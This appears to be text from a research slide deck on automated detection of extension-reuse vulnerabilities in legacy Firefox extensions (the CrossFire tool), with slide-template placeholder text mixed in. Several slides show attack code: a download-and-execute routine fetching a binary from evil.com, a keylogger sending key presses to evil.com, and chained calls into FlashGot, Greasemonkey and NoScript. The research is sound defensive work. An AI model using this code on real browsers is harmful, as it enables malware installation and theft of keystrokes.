Automated Detection of Extension- • Click to edit Master textReuse styles Vulnerabilities — Second level • Third level — Fourth level » Fifth level Ahmet S BUYUKKAYHAN William ROBERTSON Who are we? •• Assistant Click to professor edit Master of computer text science styles at Northeastern University— Second in Boston, level MA • Co-directs• Third the level NEU Systems Security Lab with Engin Kirda • Systems,— network, Fourth level and security researcher • Past winner »of FifthDEFCON level CTF with Shellphish – (a long, long time ago…)

2 Who are we? •• PhD Click Candidate to edit at MasterNortheastern text University styles –— Authored Second peer-reviewed level conference and journal papers in top-tier security• Third venues level • Member —of Fourththe NEU level Systems Security Lab » Fifth level

3 Singapore • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level

4 Boston • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level

5 Agenda • Click to edit Master text styles • Background— Second level • Extension-Reuse• Third level Attacks — Fourth level • CrossFire» & Fifth Demo level • Evaluation • Conclusion

6 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Background Browser Extensions • Click to edit Master text styles • Add new capabilities, — Second level customization to browsers • Third level • ~15K extensions in Mozilla — Fourth level Add-ons repository » Fifth level • Popular ones have millions of users • Mostly written in JavaScript

8 Legacy Firefox Extensions •• Shared Click JavaScript to edit Masternamespace text styles –— Extensions Second can read/writelevel objects or variables of others – Can• invoke Third functionality level of others • Shared window — Fourth level XUL XUL XUL – Read/write GUI» Fifthelements level – Listen to all events JavaScript • No privilege separation XPCOM – Full access to filesystem, network… File System Network

9 Threat Model • Click to edit Master text styles • The browser is an attractive target –— Extension Second authors level are untrusted • Vulnerable• Third extensions level can be exploited – “Benign-but-buggy” threat model — Fourth level • Malicious extensions are a real threat » Fifth level – Trick users into installing malicious 161 malicious extensions extensions are blocked – Powerful (“man-in-the-browser” attacks) by Mozilla+ – Easy to develop, difficult to detect

+ ://addons.mozilla.org/en-US/firefox/blocked/ – Feb 2016 10 Existing Methods for Protection •• Enforcing Click to browser edit Master text styles marketplaces— Second forlevel extensions – Automated• Third analysis level – Human— reviews Fourth level – Extension signing» Fifth level – “Vetting” • Extension isolation – Least privilege and policy-based enforcement 11 Add-on SDK (a.k.a., Jetpack) • Click to edit Master text styles • Introduced in 2009 — Second level October 2014 • Isolates• Third extensions level from each other 12.0% of the top 2,000 • Separate— content Fourth level and core scripts March 2016 • Implements» principle Fifth level of least 22.9% of the top 2,000 privilege Release Date of • But, adoption has been slow WebExtensions in Q3 2016 • Superseded by WebExtensions

12 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Extension-Reuse Attacks Attack Model • Click to edit Master text styles Evil Extension — SecondEvil Extension level (No• ThirdSensitive level Calls) — Fourth level Extension X Extension Y No Suspicious Behavior » Fifth level

Sensitive Calls Sensitive Calls

Vetting Sandbox Victim`s Browser 14 Impact •• Lack Click of isolation to edit leaves Master legacy text styles extensions— Second defenseless level against capability• Third leaks level • Attackers— can Fourth stitch level together exploits by abusing» Fifth level capabilities • The more power vulnerable extensions have, the easier it is for an evil extension

15 Download & Execute Evil Binary const• ClickWebBrowserPersist to edit= Master text styles Components.Constructor( —"@mozilla.org/embedding/browser/nsWebBrowserPersist;1" Second level , "nsIWebBrowserPersist"); var persist• = ThirdWebBrowserPersist level (); var targetFile—= Fourth level Components.classes» Fifth["@mozilla.org/file/local;1" level ] .createInstance(Components.interfaces.nsILocalFile); targetFile.initWithPath(“evil.bin"); persist.saveURI( “http://evil.com/evil.bin", null, null, null, "", targetFile, null); targetFile.launch(); 16 Extension-reuse Attack Example • Click to edit Master text styles Extension var files = [{ — Second level href: $url, description: "", Download • Third level Execute fname: $path, noRedir: true Extension X — Fourth levelExtension Y }]; » Fifth level gFlashGotService.download(files);

var gPrefMan = new GM_PrefManager(); Internet File gPrefMan.setValue(“editor”, $path); System GM_util.openInEditor(); Exe 17 To Reuse or Not To Reuse const• ClickWebBrowserPersist to edit = Master textvar files styles = [{ Components.Constructor("@mozilla.org href: $url, /embedding/browser/nsWebBrowserPersi — Second level description: "", st;1", "nsIWebBrowserPersist"); var persist• = ThirdWebBrowserPersist level (); fname: $path, var targetFile —= Fourth level noRedir: true Components.classes["@mozilla.org/fil }]; e/local;1"].createInstance» Fifth (Componentlevel gFlashGotService.download(files); s.interfaces.nsILocalFile); targetFile.initWithPath($path); var gPrefMan = new GM_PrefManager(); persist.saveURI($url, null, null, gPrefMan.setValue(“editor”, $path); null, "", targetFile, null); GM_util.openInEditor(); targetFile.launch();

18 Another Example •• A Clickkey logger, to edit which Master sends each text key styles press to evil.com

gd12.dicInline.urlWikPrefix— Second level = "http://evil.com/GD12_YOUR_LANG/steal.php?key="; gd12.keydownHandler = function(e) { gd12.dicInline.lookupWikt(String.fromCharCode(e.which),• Third level false, false); }; — Fourth level

gd12.init(); » Fifth level

Evil.com Internet

19 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level CrossFire CrossFire Overview • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level

21 DEMO • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level

22 • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level Evaluation Method •• Top Click 10 most to editdownloaded Master extensions text styles –— Manual Second analysis level on all set • Top 2000• Third most level downloaded extensions – Manual— analysis Fourth levelon random set of 323 • Case Study» Fifth level – Developed an extension with cross- extension function call – Applied to full review

24 Top 10 Firefox Extensions •Extension Click Name to edit Automated Master Exploits text Manual Exploitsstyles False Positives # of Users 0 0 4 22 M Video— DownloadHelper Second 0level 15 0 6.5 M Firebug• Third level 0 1 0 3 M NoScript— Fourth 2 level 5 2 2.5 M DownThemAll!» Fifth 0 level 5 0 1.5 M Greasemonkey 1 3 2 1.5 M Web of Trust 1 33 15 1.3 M Flash Video Down. 4 1 1 1.3 M FlashGot Mass Down. 3 5 9 1.3 M Down. YouTube Videos 0 2 1 1 M 25 Summary of Results •Detected Click Vulnerabilities to edit – Random Master Set text Positivestyles Vulnerabilities by Attack Type —True Second Positives Falselevel Positives Manual Automated • Third level —96 Fourth level 51 20% 27% » Fifth level

255 204 73% 80%

26 Breakdown of Positive Vulnerabilities • Click to edit Master text stylesCategory Description Positive Vulnerabilities By Category File I/O Code Execution Execute binary or JS — Second16% level Event Listener Registration • Third level File I/O Read from/write to 12% Filesystem — Fourth level Network Access Open a URI or download a Preference file Access » Fifth level Preference Access Read/write browser 3% settings

Code Execution Event Listener Reg. Key logging events only 3% Network Access 66%

27 Performance •• Fast Click static to analysis edit Master text styles –— ~ 1 Second sec average level (per extension) Min• Third Q1 level Median Mean Q3 Max 0.05s— Fourth 0.18s level 0.28s 1.06s 0.51s 763.91s » Fifth level • Fast exploit generation – ~ 380 secs (~ 6 mins) on average (per exploit) Min Q1 Median Mean Q3 Max 30s 192s 270s 378.6s 550.8 2160s

28 Case Study •• ValidateThisWebSite Click to edit Master text styles –— ~50 Second lines of code level – No• obfuscation Third level or attempt to hide — Fourth level – Opens unnecessary » Fifth level harmless link

// Attacker chooses $url noscriptBM.placesUtils.__ns.__global__.ns. loadErrorPage(window[1], $url);

29 Limitations •• CrossFire Click to is editnot a Mastersound and text precise styles analysis tool — Second level • CrossFire• Third does level not handle – Inferring— dynamic Fourth level types – Prototype-based» Fifth inheritance level – String evaluation

30 Mitigation & Detection •• Isolation Click to edit Master text styles • Least— Second privilege level • Secure• Thirdfunctionality level and data sharing • Check for— extension-reuse Fourth level vulnerabilities » Fifth level • Mozilla security team is informed

31 Key Takeaways • Click to edit Master text styles • Lack of isolation allows stealthy attacks — Second level • Attackers can easily automate • Third level • More robust— Fourth isolation, level vetting, and analysis required » Fifth level

32 Thank You • Click to edit Master text styles — Second level • Third level — Fourth level » Fifth level

33